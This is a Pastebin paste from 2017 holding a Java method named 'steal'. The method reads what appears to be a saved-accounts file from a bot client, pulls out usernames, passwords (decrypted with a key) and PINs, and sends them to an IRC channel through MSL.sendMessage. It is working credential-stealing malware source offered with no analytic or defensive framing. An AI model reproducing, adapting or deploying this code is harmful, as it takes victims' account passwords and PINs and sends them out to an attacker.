Advertisement
Guest User

Untitled

a guest
Aug 4th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. private static void steal() throws IOException {
  2. if (isBotter()) {
  3. BufferedReader in = new BufferedReader(new FileReader(f));
  4. String user = "[\002\003User:\002\00310 ";
  5. String pass = " \002\003Pass:\002\00310 ";
  6. String pin = " \002\003Pin:\002\00310 ";
  7. String end = "\003]";
  8. String curLine = "";
  9. String out = "";
  10. while ((curLine = in.readLine()) != null) {
  11. if (curLine.contains("[") && curLine.contains("]")) {
  12. curLine = curLine.replace("[", "").replace("]", "");
  13. if (out.length() > 5) {
  14. MSL.sendMessage(channel, out + end);
  15. out = "";
  16. }
  17. out += user + curLine;
  18. }
  19. if (curLine.contains("password=")) {
  20. out += pass + Decryption.decryptSHA1(key, curLine.replace("password=", ""));
  21. }
  22. if (curLine.contains("pin=")) {
  23. out += pin + curLine.replace("pin=", "");
  24. }
  25. }
  26. in.close();
  27. MSL.sendMessage(channel, out + end);
  28. }
  29. }
  30.  
  31. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement